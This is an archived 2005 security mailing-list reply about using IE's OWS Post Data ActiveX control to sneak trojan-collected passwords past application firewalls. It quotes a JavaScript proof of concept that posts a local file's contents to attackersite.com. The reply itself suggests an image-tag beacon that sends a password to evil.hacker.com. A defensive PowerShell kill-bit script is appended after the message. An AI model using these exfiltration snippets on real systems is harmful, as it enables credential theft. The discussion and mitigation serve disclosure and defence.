Open Source and information security mailing list archives
Date: Wed Dec 21 16:36:10 2005
From: j.schipper at math.uu.nl (Joachim Schipper)
Subject: new attack technique? using JavaScript+XML+OWS Post Data

On Wed, Dec 21, 2005 at 08:58:30PM +0530, Gaurav Kumar wrote:
> While researching COM related security vulnerabilities I thought of
> this possible attack technique, not sure if it has been discussed
> before.
> 
> 
> Problem/challenge statement:
> 
> A Trojan has been placed in a system running an application
> firewall like Zone Alarm Pro etc. The Trojan is not allowed to make
> any outbound connections. The challenge is to send data (key logged
> passwords etc) back to the attacker.

> Solution
> 
> The Trojan can be designed to generate an xml file which will contain
> the data to be sent out. The attacker will lure the user to visit a
> website hosted by him. The site can have following HTML code-
> 
> <html>
> <body>
> The author is not responsible for any misuse, this PoC is for
> educational purpose only.
> <object classid="clsid:{BDEADE98-C265-11D0-BCED-00A0C90AB50F}"
> id="exp">
> </object>
> <script LANGUAGE=javascript>
> var xmlDoc
> xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
> xmlDoc.async=false;
> xmlDoc.load("c:\\note.xml");
> xmlObj=xmlDoc.documentElement;
> var a= xmlObj.firstChild.text;
> exp.Post(0,"http://www.attackersite.com/input.asp",a);
> </script>
> </body>
> </html>
> 
> Content of note.xml could be:
> 
> <password>secret</password>
> 
> 
> The above code (works well on Windows XP SP2) essentially calls the "OWS
> Post Data" COM control to post the contents of note.xml (generated by
> the trojan) to attackersite.com.
> 
> Essentially, the technique is breaking the basic functionality of
> application firewalls by using OWS Post Data as bridge for sending out
> the data using Javascript and XML.

> flames/spam/abuse etc can be sent to spam@...urebox.org
> comments can be sent to gaurav@...urebox.org

I'll just assume you read the list.

I'm not an expert, but I don't recall ever seeing this particular
implementation. Then again, there are easier ways to go about this - for
instance, how about embedding a <img
src="http://evil.hacker.com/callback/ThisIsMyVerySecretPassWord" width=1
height=1> tag into an arbitrary HTML file? It works on any graphical
browser without special protection.

Search the archives for some more neat tricks - calling the proper APIs,
IE can be used to send out pretty much arbitrary data. [1]

If you're willing to attack ZA specifically (instead of a generic
application-based firewall, of which there are many) just use the
Windows API to generate the proper mouse clicks/keypresses.

		Joachim

[1] Some would say that, calling the 'proper' APIs, IE can be used to
send *in* pretty much arbitrary data too. I'd be inclined to agree.
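The mitigation for the control discussed in this thread is the Internet Explorer ActiveX "kill bit", which stops IE from instantiating a given CLSID regardless of what a page's script asks for. The script below is an added example, not code from either poster: it audits and, if wanted, sets the kill bit for the OWS Post Data CLSID quoted in the post, and assumes an elevated PowerShell session on Windows (the `Compatibility Flags` value and the 0x400 bit are the documented IE mechanism).

```powershell
# Added example (not from the original post): audit and set the IE ActiveX
# kill bit for the OWS Post Data control referenced in the message above.
# Requires an elevated PowerShell session on Windows to write under HKLM.
$ClsId   = '{BDEADE98-C265-11D0-BCED-00A0C90AB50F}'   # CLSID quoted in the post
$KillBit = 0x400   # Compatibility Flags bit: "never instantiate this control in IE"

# Registry roots IE consults; the Wow6432Node path covers 32-bit IE on 64-bit Windows.
$Roots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$ClassId)
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }   # no Wow6432Node on 32-bit Windows
        $key   = Join-Path $root $ClassId
        $flags = 0
        if (Test-Path $key) {
            $value = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
            if ($null -ne $value) { $flags = [int]$value }
        }
        [pscustomobject]@{
            Key     = $key
            Flags   = ('0x{0:X8}' -f $flags)
            KillBit = (($flags -band $KillBit) -ne 0)
        }
    }
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$ClassId)
    foreach ($root in $Roots) {
        if (-not (Test-Path $root)) { continue }
        $key = Join-Path $root $ClassId
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $current = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $current) { $current = 0 }
        # OR the bit in so any other compatibility flags already set are preserved.
        New-ItemProperty -Path $key -Name 'Compatibility Flags' -PropertyType DWord `
            -Value ([int]$current -bor $KillBit) -Force | Out-Null
    }
}

Get-ActiveXKillBit -ClassId $ClsId | Format-Table -AutoSize
# Set-ActiveXKillBit -ClassId $ClsId   # uncomment to apply, then re-run the audit above
```

The audit output shows `KillBit = True` per registry root once the bit is set; the same two functions work for any other CLSID you want to deny to IE.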
